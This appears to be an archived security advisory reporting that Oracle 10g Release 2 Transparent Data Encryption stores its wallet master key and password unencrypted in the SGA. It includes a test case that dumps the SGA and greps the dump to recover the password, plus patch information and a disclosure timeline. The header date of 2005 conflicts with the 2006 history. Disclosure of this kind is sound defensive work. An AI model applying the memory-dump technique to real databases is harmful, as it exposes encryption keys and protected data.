<<< Date Index >>>     <<< Thread Index >>>

Oracle Database 10g Rel. 2- Transparent Data Encryption plaintext masterkey in SGA



Transparent Data Encryption stores key unencrypted in the SGA

Name        Transparent Data Encryption stores key unencrypted in the SGA
Affected        Oracle Database 10g Release 2
Severity        High Risk
Category        Information disclosure
Vendor URL      http://www.oracle.com/
Author  Alexander Kornbrust (ak at red-database-security.com)
Date          17 January 2005 (V 1.00)
Oracle Bug      5802173
Time to fix 190 days


Details:
########
The Oracle security feature "Transparent Data Encryption" is storing the 
masterkey unencrypted in the SGA. A skilled attacker or non-security DBA can 
retrieve the plaintext masterkey.

Test case:
##########

SQL> ALTER SYSTEM SET WALLET OPEN IDENTIFIED BY "secretpassword";

System altered.
SQL> exit
Disconnected from Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 
Production With the Partitioning, OLAP and Data Mining options


[oracle@ora10201 /]$ export DUMPSGA_DIR=/oracle/10.2.0/bin

[oracle@ora10201 /]$ cd /tmp

[oracle@ora10201 /]$ dumpsga 

[oracle@ora10201 /]$ strings * | grep -iH secretpassword 

secretpassword 
secretpassword 
secretpassword


[] Excerpt from the SGA
/oracle/10.2.0/admin/ora01/wallet/^@"[q^@^@ôçd$d$^@?y*cle/10.2.0/admin/ora10201/wallet/^@^@^@^@^@^9^@^@0êd$d¤d$-

^@^@0êd$L4^L¿^Xp 
/¹]/º<8f>^Dsecretpassword^@^M^U^B^@èd$´4^Lfile:/oracle/10.2.0/admin/ora10201/wallet
[]


Patch Information:
##################
Oracle fixed this issue with the patches from the critical patch update january 
2006 for Oracle 10g Release 2.

History:
########
11-jul-2005 Oracle secalert was informed
12-jul-2005 Bug confirmed
17-jan-2006 Oracle published the Critical Patch Update January 2006 
(CPU January 2006)
17-jan-2006 Red-Database-Security published this advisory



© 2006 by Red-Database-Security GmbH 
http://www.red-database-security.com/advisory/oracle_cpu_jan_2006.html